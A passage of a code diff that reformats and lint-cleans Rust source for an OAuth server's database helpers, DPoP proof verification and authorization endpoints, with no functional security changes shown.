··· 1 + use super::super::{DeviceData, OAuthError}; 1 2 use chrono::{DateTime, Utc}; 2 3 use sqlx::PgPool; 3 - use super::super::{DeviceData, OAuthError}; 4 4 5 5 pub struct DeviceAccountRow { 6 6 pub did: String, ··· 49 49 })) 50 50 } 51 51 52 - pub async fn update_device_last_seen( 53 - pool: &PgPool, 54 - device_id: &str, 55 - ) -> Result<(), OAuthError> { 52 + pub async fn update_device_last_seen(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> { 56 53 sqlx::query!( 57 54 r#" 58 55 UPDATE oauth_device
+2 -5
src/oauth/db/dpop.rs
··· 1 - use sqlx::PgPool; 2 1 use super::super::OAuthError; 2 + use sqlx::PgPool; 3 3 4 - pub async fn check_and_record_dpop_jti( 5 - pool: &PgPool, 6 - jti: &str, 7 - ) -> Result<bool, OAuthError> { 4 + pub async fn check_and_record_dpop_jti(pool: &PgPool, jti: &str) -> Result<bool, OAuthError> { 8 5 let result = sqlx::query!( 9 6 r#" 10 7 INSERT INTO oauth_dpop_jti (jti)
+1 -1
src/oauth/db/helpers.rs
··· 1 - use serde::{de::DeserializeOwned, Serialize}; 2 1 use super::super::OAuthError; 2 + use serde::{Serialize, de::DeserializeOwned}; 3 3 4 4 pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> { 5 5 serde_json::to_value(value).map_err(|e| {
+5 -5
src/oauth/db/mod.rs
··· 8 8 9 9 pub use client::{get_authorized_client, upsert_authorized_client}; 10 10 pub use device::{ 11 - create_device, delete_device, get_device, get_device_accounts, update_device_last_seen, 12 - upsert_account_device, verify_account_on_device, DeviceAccountRow, 11 + DeviceAccountRow, create_device, delete_device, get_device, get_device_accounts, 12 + update_device_last_seen, upsert_account_device, verify_account_on_device, 13 13 }; 14 14 pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis}; 15 15 pub use request::{ ··· 23 23 get_token_by_refresh_token, list_tokens_for_user, rotate_token, 24 24 }; 25 25 pub use two_factor::{ 26 - check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge, 27 - delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code, 28 - get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge, 26 + TwoFactorChallenge, check_user_2fa_enabled, cleanup_expired_2fa_challenges, 27 + create_2fa_challenge, delete_2fa_challenge, delete_2fa_challenge_by_request_uri, 28 + generate_2fa_code, get_2fa_challenge, increment_2fa_attempts, 29 29 };
+1 -1
src/oauth/db/request.rs
··· 1 - use sqlx::PgPool; 2 1 use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData}; 3 2 use super::helpers::{from_json, to_json}; 3 + use sqlx::PgPool; 4 4 5 5 pub async fn create_authorization_request( 6 6 pool: &PgPool,
+4 -10
src/oauth/db/token.rs
··· 1 + use super::super::{OAuthError, TokenData}; 2 + use super::helpers::{from_json, to_json}; 1 3 use chrono::{DateTime, Utc}; 2 4 use sqlx::PgPool; 3 - use super::super::{OAuthError, TokenData}; 4 - use super::helpers::{from_json, to_json}; 5 5 6 - pub async fn create_token( 7 - pool: &PgPool, 8 - data: &TokenData, 9 - ) -> Result<i32, OAuthError> { 6 + pub async fn create_token(pool: &PgPool, data: &TokenData) -> Result<i32, OAuthError> { 10 7 let client_auth_json = to_json(&data.client_auth)?; 11 8 let parameters_json = to_json(&data.parameters)?; 12 9 let row = sqlx::query!( ··· 193 190 Ok(()) 194 191 } 195 192 196 - pub async fn list_tokens_for_user( 197 - pool: &PgPool, 198 - did: &str, 199 - ) -> Result<Vec<TokenData>, OAuthError> { 193 + pub async fn list_tokens_for_user(pool: &PgPool, did: &str) -> Result<Vec<TokenData>, OAuthError> { 200 194 let rows = sqlx::query!( 201 195 r#" 202 196 SELECT did, token_id, created_at, updated_at, expires_at, client_id, client_auth,
+1 -1
src/oauth/db/two_factor.rs
··· 1 + use super::super::OAuthError; 1 2 use chrono::{DateTime, Duration, Utc}; 2 3 use rand::Rng; 3 4 use sqlx::PgPool; 4 5 use uuid::Uuid; 5 - use super::super::OAuthError; 6 6 7 7 pub struct TwoFactorChallenge { 8 8 pub id: Uuid,
+79 -48
src/oauth/dpop.rs
··· 61 61 let timestamp_bytes = timestamp.to_be_bytes(); 62 62 let mut hasher = Sha256::new(); 63 63 hasher.update(&self.secret); 64 - hasher.update(&timestamp_bytes); 64 + hasher.update(timestamp_bytes); 65 65 let hash = hasher.finalize(); 66 66 let mut nonce_data = Vec::with_capacity(8 + 16); 67 67 nonce_data.extend_from_slice(&timestamp_bytes); ··· 74 74 .decode(nonce) 75 75 .map_err(|_| OAuthError::InvalidDpopProof("Invalid nonce encoding".to_string()))?; 76 76 if nonce_bytes.len() < 24 { 77 - return Err(OAuthError::InvalidDpopProof("Invalid nonce length".to_string())); 77 + return Err(OAuthError::InvalidDpopProof( 78 + "Invalid nonce length".to_string(), 79 + )); 78 80 } 79 81 let timestamp_bytes: [u8; 8] = nonce_bytes[..8] 80 82 .try_into() ··· 86 88 } 87 89 let mut hasher = Sha256::new(); 88 90 hasher.update(&self.secret); 89 - hasher.update(&timestamp_bytes); 91 + hasher.update(timestamp_bytes); 90 92 let expected_hash = hasher.finalize(); 91 93 if nonce_bytes[8..24] != expected_hash[..16] { 92 - return Err(OAuthError::InvalidDpopProof("Invalid nonce signature".to_string())); 94 + return Err(OAuthError::InvalidDpopProof( 95 + "Invalid nonce signature".to_string(), 96 + )); 93 97 } 94 98 Ok(()) 95 99 } ··· 103 107 ) -> Result<DPoPVerifyResult, OAuthError> { 104 108 let parts: Vec<&str> = dpop_header.split('.').collect(); 105 109 if parts.len() != 3 { 106 - return Err(OAuthError::InvalidDpopProof("Invalid DPoP proof format".to_string())); 110 + return Err(OAuthError::InvalidDpopProof( 111 + "Invalid DPoP proof format".to_string(), 112 + )); 107 113 } 108 114 let header_json = URL_SAFE_NO_PAD 109 115 .decode(parts[0]) ··· 116 122 let payload: DPoPProofPayload = serde_json::from_slice(&payload_json) 117 123 .map_err(|_| OAuthError::InvalidDpopProof("Invalid payload JSON".to_string()))?; 118 124 if header.typ != "dpop+jwt" { 119 - return Err(OAuthError::InvalidDpopProof("Invalid typ claim".to_string())); 125 + return Err(OAuthError::InvalidDpopProof( 126 + "Invalid typ claim".to_string(), 127 + )); 120 128 } 121 129 if !matches!(header.alg.as_str(), "ES256" | "ES384" | "ES512" | "EdDSA") { 122 - return Err(OAuthError::InvalidDpopProof("Unsupported algorithm".to_string())); 130 + return Err(OAuthError::InvalidDpopProof( 131 + "Unsupported algorithm".to_string(), 132 + )); 123 133 } 124 134 if payload.htm.to_uppercase() != http_method.to_uppercase() { 125 - return Err(OAuthError::InvalidDpopProof("HTTP method mismatch".to_string())); 135 + return Err(OAuthError::InvalidDpopProof( 136 + "HTTP method mismatch".to_string(), 137 + )); 126 138 } 127 139 let proof_uri = payload.htu.split('?').next().unwrap_or(&payload.htu); 128 140 let request_uri = http_uri.split('?').next().unwrap_or(http_uri); 129 141 if proof_uri != request_uri { 130 - return Err(OAuthError::InvalidDpopProof("HTTP URI mismatch".to_string())); 142 + return Err(OAuthError::InvalidDpopProof( 143 + "HTTP URI mismatch".to_string(), 144 + )); 131 145 } 132 146 let now = Utc::now().timestamp(); 133 147 if (now - payload.iat).abs() > DPOP_MAX_AGE_SECS { 134 - return Err(OAuthError::InvalidDpopProof("Proof too old or from the future".to_string())); 148 + return Err(OAuthError::InvalidDpopProof( 149 + "Proof too old or from the future".to_string(), 150 + )); 135 151 } 136 152 if let Some(nonce) = &payload.nonce { 137 153 self.validate_nonce(nonce)?; ··· 155 171 .decode(parts[2]) 156 172 .map_err(|_| OAuthError::InvalidDpopProof("Invalid signature encoding".to_string()))?; 157 173 let signing_input = format!("{}.{}", parts[0], parts[1]); 158 - verify_dpop_signature(&header.alg, &header.jwk, signing_input.as_bytes(), &signature_bytes)?; 174 + verify_dpop_signature( 175 + &header.alg, 176 + &header.jwk, 177 + signing_input.as_bytes(), 178 + &signature_bytes, 179 + )?; 159 180 let jkt = compute_jwk_thumbprint(&header.jwk)?; 160 181 Ok(DPoPVerifyResult { 161 182 jkt, ··· 186 207 use p256::ecdsa::{Signature, VerifyingKey}; 187 208 use p256::elliptic_curve::sec1::FromEncodedPoint; 188 209 use p256::{AffinePoint, EncodedPoint}; 189 - let crv = jwk.crv.as_ref().ok_or_else(|| { 190 - OAuthError::InvalidDpopProof("Missing crv for ES256".to_string()) 191 - })?; 210 + let crv = jwk 211 + .crv 212 + .as_ref() 213 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing crv for ES256".to_string()))?; 192 214 if crv != "P-256" { 193 215 return Err(OAuthError::InvalidDpopProof(format!( 194 216 "Invalid curve for ES256: {}", ··· 196 218 ))); 197 219 } 198 220 let x_bytes = URL_SAFE_NO_PAD 199 - .decode(jwk.x.as_ref().ok_or_else(|| { 200 - OAuthError::InvalidDpopProof("Missing x coordinate".to_string()) 201 - })?) 221 + .decode( 222 + jwk.x 223 + .as_ref() 224 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing x coordinate".to_string()))?, 225 + ) 202 226 .map_err(|_| OAuthError::InvalidDpopProof("Invalid x encoding".to_string()))?; 203 227 let y_bytes = URL_SAFE_NO_PAD 204 - .decode(jwk.y.as_ref().ok_or_else(|| { 205 - OAuthError::InvalidDpopProof("Missing y coordinate".to_string()) 206 - })?) 228 + .decode( 229 + jwk.y 230 + .as_ref() 231 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing y coordinate".to_string()))?, 232 + ) 207 233 .map_err(|_| OAuthError::InvalidDpopProof("Invalid y encoding".to_string()))?; 208 234 let point = EncodedPoint::from_affine_coordinates( 209 235 x_bytes.as_slice().into(), ··· 211 237 false, 212 238 ); 213 239 let affine_opt: Option<AffinePoint> = AffinePoint::from_encoded_point(&point).into(); 214 - let affine = affine_opt 215 - .ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?; 240 + let affine = 241 + affine_opt.ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?; 216 242 let verifying_key = VerifyingKey::from_affine(affine) 217 243 .map_err(|_| OAuthError::InvalidDpopProof("Invalid verifying key".to_string()))?; 218 244 let sig = Signature::from_slice(signature) ··· 227 253 use p384::ecdsa::{Signature, VerifyingKey}; 228 254 use p384::elliptic_curve::sec1::FromEncodedPoint; 229 255 use p384::{AffinePoint, EncodedPoint}; 230 - let crv = jwk.crv.as_ref().ok_or_else(|| { 231 - OAuthError::InvalidDpopProof("Missing crv for ES384".to_string()) 232 - })?; 256 + let crv = jwk 257 + .crv 258 + .as_ref() 259 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing crv for ES384".to_string()))?; 233 260 if crv != "P-384" { 234 261 return Err(OAuthError::InvalidDpopProof(format!( 235 262 "Invalid curve for ES384: {}", ··· 237 264 ))); 238 265 } 239 266 let x_bytes = URL_SAFE_NO_PAD 240 - .decode(jwk.x.as_ref().ok_or_else(|| { 241 - OAuthError::InvalidDpopProof("Missing x coordinate".to_string()) 242 - })?) 267 + .decode( 268 + jwk.x 269 + .as_ref() 270 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing x coordinate".to_string()))?, 271 + ) 243 272 .map_err(|_| OAuthError::InvalidDpopProof("Invalid x encoding".to_string()))?; 244 273 let y_bytes = URL_SAFE_NO_PAD 245 - .decode(jwk.y.as_ref().ok_or_else(|| { 246 - OAuthError::InvalidDpopProof("Missing y coordinate".to_string()) 247 - })?) 274 + .decode( 275 + jwk.y 276 + .as_ref() 277 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing y coordinate".to_string()))?, 278 + ) 248 279 .map_err(|_| OAuthError::InvalidDpopProof("Invalid y encoding".to_string()))?; 249 280 let point = EncodedPoint::from_affine_coordinates( 250 281 x_bytes.as_slice().into(), ··· 252 283 false, 253 284 ); 254 285 let affine_opt: Option<AffinePoint> = AffinePoint::from_encoded_point(&point).into(); 255 - let affine = affine_opt 256 - .ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?; 286 + let affine = 287 + affine_opt.ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?; 257 288 let verifying_key = VerifyingKey::from_affine(affine) 258 289 .map_err(|_| OAuthError::InvalidDpopProof("Invalid verifying key".to_string()))?; 259 290 let sig = Signature::from_slice(signature) ··· 265 296 266 297 fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> { 267 298 use ed25519_dalek::{Signature, VerifyingKey}; 268 - let crv = jwk.crv.as_ref().ok_or_else(|| { 269 - OAuthError::InvalidDpopProof("Missing crv for EdDSA".to_string()) 270 - })?; 299 + let crv = jwk 300 + .crv 301 + .as_ref() 302 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing crv for EdDSA".to_string()))?; 271 303 if crv != "Ed25519" { 272 304 return Err(OAuthError::InvalidDpopProof(format!( 273 305 "Invalid curve for EdDSA: {}", ··· 275 307 ))); 276 308 } 277 309 let x_bytes = URL_SAFE_NO_PAD 278 - .decode(jwk.x.as_ref().ok_or_else(|| { 279 - OAuthError::InvalidDpopProof("Missing x coordinate".to_string()) 280 - })?) 310 + .decode( 311 + jwk.x 312 + .as_ref() 313 + .ok_or_else(|| OAuthError::InvalidDpopProof("Missing x coordinate".to_string()))?, 314 + ) 281 315 .map_err(|_| OAuthError::InvalidDpopProof("Invalid x encoding".to_string()))?; 282 - let key_bytes: [u8; 32] = x_bytes.try_into().map_err(|_| { 283 - OAuthError::InvalidDpopProof("Invalid Ed25519 key length".to_string()) 284 - })?; 316 + let key_bytes: [u8; 32] = x_bytes 317 + .try_into() 318 + .map_err(|_| OAuthError::InvalidDpopProof("Invalid Ed25519 key length".to_string()))?; 285 319 let verifying_key = VerifyingKey::from_bytes(&key_bytes) 286 320 .map_err(|_| OAuthError::InvalidDpopProof("Invalid Ed25519 key".to_string()))?; 287 321 let sig_bytes: [u8; 64] = signature.try_into().map_err(|_| { ··· 308 342 .y 309 343 .as_ref() 310 344 .ok_or_else(|| OAuthError::InvalidDpopProof("Missing y".to_string()))?; 311 - format!( 312 - r#"{{"crv":"{}","kty":"EC","x":"{}","y":"{}"}}"#, 313 - crv, x, y 314 - ) 345 + format!(r#"{{"crv":"{}","kty":"EC","x":"{}","y":"{}"}}"#, crv, x, y) 315 346 } 316 347 "OKP" => { 317 348 let crv = jwk ··· 333 364 let mut hasher = Sha256::new(); 334 365 hasher.update(canonical.as_bytes()); 335 366 let hash = hasher.finalize(); 336 - Ok(URL_SAFE_NO_PAD.encode(&hash)) 367 + Ok(URL_SAFE_NO_PAD.encode(hash)) 337 368 } 338 369 339 370 pub fn compute_access_token_hash(access_token: &str) -> String { 340 371 let mut hasher = Sha256::new(); 341 372 hasher.update(access_token.as_bytes()); 342 373 let hash = hasher.finalize(); 343 - URL_SAFE_NO_PAD.encode(&hash) 374 + URL_SAFE_NO_PAD.encode(hash) 344 375 } 345 376 346 377 #[cfg(test)]
+166 -96
src/oauth/endpoints/authorize.rs
··· 1 + use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code}; 2 + use crate::oauth::{ 3 + Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates, 4 + }; 5 + use crate::state::{AppState, RateLimitKind}; 1 6 use axum::{ 2 7 Form, Json, 3 8 extract::{Query, State}, 4 - http::{HeaderMap, StatusCode, header::{SET_COOKIE, LOCATION}}, 5 - response::{IntoResponse, Redirect, Response, Html}, 9 + http::{ 10 + HeaderMap, StatusCode, 11 + header::{LOCATION, SET_COOKIE}, 12 + }, 13 + response::{Html, IntoResponse, Redirect, Response}, 6 14 }; 7 15 use chrono::Utc; 8 16 use serde::{Deserialize, Serialize}; 9 17 use subtle::ConstantTimeEq; 10 18 use urlencoding::encode as url_encode; 11 - use crate::state::{AppState, RateLimitKind}; 12 - use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates}; 13 - use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code}; 14 19 15 20 const DEVICE_COOKIE_NAME: &str = "oauth_device_id"; 16 21 ··· 34 39 } 35 40 36 41 fn extract_client_ip(headers: &HeaderMap) -> String { 37 - if let Some(forwarded) = headers.get("x-forwarded-for") { 38 - if let Ok(value) = forwarded.to_str() { 39 - if let Some(first_ip) = value.split(',').next() { 42 + if let Some(forwarded) = headers.get("x-forwarded-for") 43 + && let Ok(value) = forwarded.to_str() 44 + && let Some(first_ip) = value.split(',').next() { 40 45 return first_ip.trim().to_string(); 41 46 } 42 - } 43 - } 44 - if let Some(real_ip) = headers.get("x-real-ip") { 45 - if let Ok(value) = real_ip.to_str() { 47 + if let Some(real_ip) = headers.get("x-real-ip") 48 + && let Ok(value) = real_ip.to_str() { 46 49 return value.trim().to_string(); 47 50 } 48 - } 49 51 "0.0.0.0".to_string() 50 52 } 51 53 ··· 59 61 fn make_device_cookie(device_id: &str) -> String { 60 62 format!( 61 63 "{}={}; Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000", 62 - DEVICE_COOKIE_NAME, 63 - device_id 64 + DEVICE_COOKIE_NAME, device_id 64 65 ) 65 66 } 66 67 ··· 127 128 "invalid_request", 128 129 Some("Missing request_uri parameter. Use PAR to initiate authorization."), 129 130 )), 130 - ).into_response(); 131 + ) 132 + .into_response(); 131 133 } 132 134 }; 133 135 let request_data = match db::get_authorization_request(&state.db, &request_uri).await { ··· 146 148 axum::http::StatusCode::BAD_REQUEST, 147 149 Html(templates::error_page( 148 150 "invalid_request", 149 - Some("Invalid or expired request_uri. Please start a new authorization request."), 151 + Some( 152 + "Invalid or expired request_uri. Please start a new authorization request.", 153 + ), 150 154 )), 151 - ).into_response(); 155 + ) 156 + .into_response(); 152 157 } 153 158 Err(e) => { 154 159 if wants_json(&headers) { ··· 158 163 "error": "server_error", 159 164 "error_description": format!("Database error: {:?}", e) 160 165 })), 161 - ).into_response(); 166 + ) 167 + .into_response(); 162 168 } 163 169 return ( 164 170 axum::http::StatusCode::INTERNAL_SERVER_ERROR, ··· 166 172 "server_error", 167 173 Some(&format!("Database error: {:?}", e)), 168 174 )), 169 - ).into_response(); 175 + ) 176 + .into_response(); 170 177 } 171 178 }; 172 179 if request_data.expires_at < Utc::now() { ··· 186 193 "invalid_request", 187 194 Some("Authorization request has expired. Please start a new request."), 188 195 )), 189 - ).into_response(); 196 + ) 197 + .into_response(); 190 198 } 191 199 if wants_json(&headers) { 192 200 return Json(AuthorizeResponse { ··· 196 204 redirect_uri: request_data.parameters.redirect_uri.clone(), 197 205 state: request_data.parameters.state.clone(), 198 206 login_hint: request_data.parameters.login_hint.clone(), 199 - }).into_response(); 207 + }) 208 + .into_response(); 200 209 } 201 210 let force_new_account = query.new_account.unwrap_or(false); 202 - if !force_new_account { 203 - if let Some(device_id) = extract_device_cookie(&headers) { 204 - if let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await { 205 - if !accounts.is_empty() { 211 + if !force_new_account 212 + && let Some(device_id) = extract_device_cookie(&headers) 213 + && let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await 214 + && !accounts.is_empty() { 206 215 let device_accounts: Vec<DeviceAccount> = accounts 207 216 .into_iter() 208 217 .map(|row| DeviceAccount { ··· 217 226 None, 218 227 &request_uri, 219 228 &device_accounts, 220 - )).into_response(); 229 + )) 230 + .into_response(); 221 231 } 222 - } 223 - } 224 - } 225 232 Html(templates::login_page( 226 233 &request_data.parameters.client_id, 227 234 None, ··· 229 236 &request_uri, 230 237 None, 231 238 request_data.parameters.login_hint.as_deref(), 232 - )).into_response() 239 + )) 240 + .into_response() 233 241 } 234 242 235 243 pub async fn authorize_get_json( 236 244 State(state): State<AppState>, 237 245 Query(query): Query<AuthorizeQuery>, 238 246 ) -> Result<Json<AuthorizeResponse>, OAuthError> { 239 - let request_uri = query.request_uri.ok_or_else(|| { 240 - OAuthError::InvalidRequest("request_uri is required".to_string()) 241 - })?; 247 + let request_uri = query 248 + .request_uri 249 + .ok_or_else(|| OAuthError::InvalidRequest("request_uri is required".to_string()))?; 242 250 let request_data = db::get_authorization_request(&state.db, &request_uri) 243 251 .await? 244 252 .ok_or_else(|| OAuthError::InvalidRequest("Invalid or expired request_uri".to_string()))?; 245 253 if request_data.expires_at < Utc::now() { 246 254 db::delete_authorization_request(&state.db, &request_uri).await?; 247 - return Err(OAuthError::InvalidRequest("request_uri has expired".to_string())); 255 + return Err(OAuthError::InvalidRequest( 256 + "request_uri has expired".to_string(), 257 + )); 248 258 } 249 259 Ok(Json(AuthorizeResponse { 250 260 client_id: request_data.parameters.client_id.clone(), ··· 263 273 ) -> Response { 264 274 let json_response = wants_json(&headers); 265 275 let client_ip = extract_client_ip(&headers); 266 - if !state.check_rate_limit(RateLimitKind::OAuthAuthorize, &client_ip).await { 276 + if !state 277 + .check_rate_limit(RateLimitKind::OAuthAuthorize, &client_ip) 278 + .await 279 + { 267 280 tracing::warn!(ip = %client_ip, "OAuth authorize rate limit exceeded"); 268 281 if json_response { 269 282 return ( ··· 272 285 "error": "RateLimitExceeded", 273 286 "error_description": "Too many login attempts. Please try again later." 274 287 })), 275 - ).into_response(); 288 + ) 289 + .into_response(); 276 290 } 277 291 return ( 278 292 axum::http::StatusCode::TOO_MANY_REQUESTS, ··· 280 294 "RateLimitExceeded", 281 295 Some("Too many login attempts. Please try again later."), 282 296 )), 283 - ).into_response(); 297 + ) 298 + .into_response(); 284 299 } 285 300 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 286 301 Ok(Some(data)) => data, ··· 292 307 "error": "invalid_request", 293 308 "error_description": "Invalid or expired request_uri." 294 309 })), 295 - ).into_response(); 310 + ) 311 + .into_response(); 296 312 } 297 313 return Html(templates::error_page( 298 314 "invalid_request", 299 315 Some("Invalid or expired request_uri. Please start a new authorization request."), 300 - )).into_response(); 316 + )) 317 + .into_response(); 301 318 } 302 319 Err(e) => { 303 320 if json_response { ··· 307 324 "error": "server_error", 308 325 "error_description": format!("Database error: {:?}", e) 309 326 })), 310 - ).into_response(); 327 + ) 328 + .into_response(); 311 329 } 312 330 return Html(templates::error_page( 313 331 "server_error", 314 332 Some(&format!("Database error: {:?}", e)), 315 - )).into_response(); 333 + )) 334 + .into_response(); 316 335 } 317 336 }; 318 337 if request_data.expires_at < Utc::now() { ··· 324 343 "error": "invalid_request", 325 344 "error_description": "Authorization request has expired." 326 345 })), 327 - ).into_response(); 346 + ) 347 + .into_response(); 328 348 } 329 349 return Html(templates::error_page( 330 350 "invalid_request", 331 351 Some("Authorization request has expired. Please start a new request."), 332 - )).into_response(); 352 + )) 353 + .into_response(); 333 354 } 334 355 let show_login_error = |error_msg: &str, json: bool| -> Response { 335 356 if json { ··· 339 360 "error": "access_denied", 340 361 "error_description": error_msg 341 362 })), 342 - ).into_response(); 363 + ) 364 + .into_response(); 343 365 } 344 366 Html(templates::login_page( 345 367 &request_data.parameters.client_id, ··· 348 370 &form.request_uri, 349 371 Some(error_msg), 350 372 Some(&form.username), 351 - )).into_response() 373 + )) 374 + .into_response() 352 375 }; 353 376 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 354 377 let normalized_username = form.username.trim(); 355 - let normalized_username = normalized_username.strip_prefix('@').unwrap_or(normalized_username); 356 - let normalized_username = if let Some(bare_handle) = normalized_username.strip_suffix(&format!(".{}", pds_hostname)) { 378 + let normalized_username = normalized_username 379 + .strip_prefix('@') 380 + .unwrap_or(normalized_username); 381 + let normalized_username = if let Some(bare_handle) = 382 + normalized_username.strip_suffix(&format!(".{}", pds_hostname)) 383 + { 357 384 bare_handle.to_string() 358 385 } else { 359 386 normalized_username.to_string() ··· 401 428 let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await; 402 429 match db::create_2fa_challenge(&state.db, &user.did, &form.request_uri).await { 403 430 Ok(challenge) => { 404 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 405 - if let Err(e) = enqueue_2fa_code( 406 - &state.db, 407 - user.id, 408 - &challenge.code, 409 - &hostname, 410 - ).await { 431 + let hostname = 432 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 433 + if let Err(e) = 434 + enqueue_2fa_code(&state.db, user.id, &challenge.code, &hostname).await 435 + { 411 436 tracing::warn!( 412 437 did = %user.did, 413 438 error = %e, ··· 441 466 ip_address: extract_client_ip(&headers), 442 467 last_seen_at: Utc::now(), 443 468 }; 444 - if db::create_device(&state.db, &new_id.0, &device_data).await.is_ok() { 469 + if db::create_device(&state.db, &new_id.0, &device_data) 470 + .await 471 + .is_ok() 472 + { 445 473 new_cookie = Some(make_device_cookie(&new_id.0)); 446 474 device_id = Some(new_id.0.clone()); 447 475 } ··· 449 477 }; 450 478 let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await; 451 479 } 452 - if let Err(_) = db::update_authorization_request( 480 + if db::update_authorization_request( 453 481 &state.db, 454 482 &form.request_uri, 455 483 &user.did, ··· 457 485 &code.0, 458 486 ) 459 487 .await 488 + .is_err() 460 489 { 461 490 return show_login_error("An error occurred. Please try again.", json_response); 462 491 } ··· 466 495 request_data.parameters.state.as_deref(), 467 496 ); 468 497 if let Some(cookie) = new_cookie { 469 - (StatusCode::SEE_OTHER, [(SET_COOKIE, cookie), (LOCATION, redirect_url)]).into_response() 498 + ( 499 + StatusCode::SEE_OTHER, 500 + [(SET_COOKIE, cookie), (LOCATION, redirect_url)], 501 + ) 502 + .into_response() 470 503 } else { 471 504 redirect_see_other(&redirect_url) 472 505 } ··· 483 516 return Html(templates::error_page( 484 517 "invalid_request", 485 518 Some("Invalid or expired request_uri. Please start a new authorization request."), 486 - )).into_response(); 519 + )) 520 + .into_response(); 487 521 } 488 522 Err(_) => { 489 523 return Html(templates::error_page( 490 524 "server_error", 491 525 Some("An error occurred. Please try again."), 492 - )).into_response(); 526 + )) 527 + .into_response(); 493 528 } 494 529 }; 495 530 if request_data.expires_at < Utc::now() { ··· 497 532 return Html(templates::error_page( 498 533 "invalid_request", 499 534 Some("Authorization request has expired. Please start a new request."), 500 - )).into_response(); 535 + )) 536 + .into_response(); 501 537 } 502 538 let device_id = match extract_device_cookie(&headers) { 503 539 Some(id) => id, ··· 505 541 return Html(templates::error_page( 506 542 "invalid_request", 507 543 Some("No device session found. Please sign in."), 508 - )).into_response(); 544 + )) 545 + .into_response(); 509 546 } 510 547 }; 511 548 let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await { ··· 514 551 return Html(templates::error_page( 515 552 "server_error", 516 553 Some("An error occurred. Please try again."), 517 - )).into_response(); 554 + )) 555 + .into_response(); 518 556 } 519 557 }; 520 558 if !account_valid { 521 559 return Html(templates::error_page( 522 560 "access_denied", 523 561 Some("This account is not available on this device. Please sign in."), 524 - )).into_response(); 562 + )) 563 + .into_response(); 525 564 } 526 565 let user = match sqlx::query!( 527 566 r#" ··· 553 592 let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await; 554 593 match db::create_2fa_challenge(&state.db, &form.did, &form.request_uri).await { 555 594 Ok(challenge) => { 556 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 557 - if let Err(e) = enqueue_2fa_code( 558 - &state.db, 559 - user.id, 560 - &challenge.code, 561 - &hostname, 562 - ).await { 595 + let hostname = 596 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 597 + if let Err(e) = 598 + enqueue_2fa_code(&state.db, user.id, &challenge.code, &hostname).await 599 + { 563 600 tracing::warn!( 564 601 did = %form.did, 565 602 error = %e, ··· 578 615 return Html(templates::error_page( 579 616 "server_error", 580 617 Some("An error occurred. Please try again."), 581 - )).into_response(); 618 + )) 619 + .into_response(); 582 620 } 583 621 } 584 622 } 585 623 let _ = db::upsert_account_device(&state.db, &form.did, &device_id).await; 586 624 let code = Code::generate(); 587 - if let Err(_) = db::update_authorization_request( 625 + if db::update_authorization_request( 588 626 &state.db, 589 627 &form.request_uri, 590 628 &form.did, ··· 592 630 &code.0, 593 631 ) 594 632 .await 633 + .is_err() 595 634 { 596 635 return Html(templates::error_page( 597 636 "server_error", 598 637 Some("An error occurred. Please try again."), 599 - )).into_response(); 638 + )) 639 + .into_response(); 600 640 } 601 641 let redirect_url = build_success_redirect( 602 642 &request_data.parameters.redirect_uri, ··· 615 655 redirect_url.push_str(&format!("&state={}", url_encode(req_state))); 616 656 } 617 657 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 618 - redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname)))); 658 + redirect_url.push_str(&format!( 659 + "&iss={}", 660 + url_encode(&format!("https://{}", pds_hostname)) 661 + )); 619 662 redirect_url 620 663 } 621 664 ··· 674 717 return Html(templates::error_page( 675 718 "invalid_request", 676 719 Some("No 2FA challenge found. Please start over."), 677 - )).into_response(); 720 + )) 721 + .into_response(); 678 722 } 679 723 Err(_) => { 680 724 return Html(templates::error_page( 681 725 "server_error", 682 726 Some("An error occurred. Please try again."), 683 - )).into_response(); 727 + )) 728 + .into_response(); 684 729 } 685 730 }; 686 731 if challenge.expires_at < Utc::now() { ··· 688 733 return Html(templates::error_page( 689 734 "invalid_request", 690 735 Some("2FA code has expired. Please start over."), 691 - )).into_response(); 736 + )) 737 + .into_response(); 692 738 } 693 739 let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await { 694 740 Ok(Some(d)) => d, ··· 696 742 return Html(templates::error_page( 697 743 